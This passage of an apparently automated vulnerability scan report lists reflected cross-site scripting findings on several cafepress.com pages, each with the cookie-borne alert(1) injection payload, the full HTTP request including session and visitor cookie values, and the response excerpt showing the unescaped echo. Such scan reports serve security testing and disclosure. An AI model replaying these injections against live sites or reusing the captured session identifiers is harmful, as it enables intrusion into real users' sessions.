= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '56c87</script><script>alert(1)</script>eb1ed059733'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.28. http://www.cafepress.com/+coasters [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+coasters

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d05a"-alert(1)-"a640bcdbb5e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59298
Date: Sun, 26 Dec 2010 13:48:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.29. http://www.cafepress.com/+coasters [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+coasters

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b5e</script><script>alert(1)</script>c56a41dcd4d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=47b5e</script><script>alert(1)</script>c56a41dcd4d; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59305
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '47b5e</script><script>alert(1)</script>c56a41dcd4d'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+eat_sleep_game_light_tshirt,299007536

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbfc3"-alert(1)-"de6154bb2da was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 93266
Date: Sun, 26 Dec 2010 13:49:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+eat_sleep_game_light_tshirt,299007536

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58edd</script><script>alert(1)</script>b17bfa61193 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=58edd</script><script>alert(1)</script>b17bfa61193; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 93292
Date: Sun, 26 Dec 2010 13:49:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'ProductDetails'
window.cafepress.tealeaf.searchTerm = '58edd</script><script>alert(1)</script>b17bfa61193'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.32. http://www.cafepress.com/+framed-prints [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+framed-prints

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4dfd"-alert(1)-"012c3a7120a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 63755
Date: Sun, 26 Dec 2010 13:48:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.33. http://www.cafepress.com/+framed-prints [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+framed-prints

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d2c</script><script>alert(1)</script>063b6447c14 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93d2c</script><script>alert(1)</script>063b6447c14; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 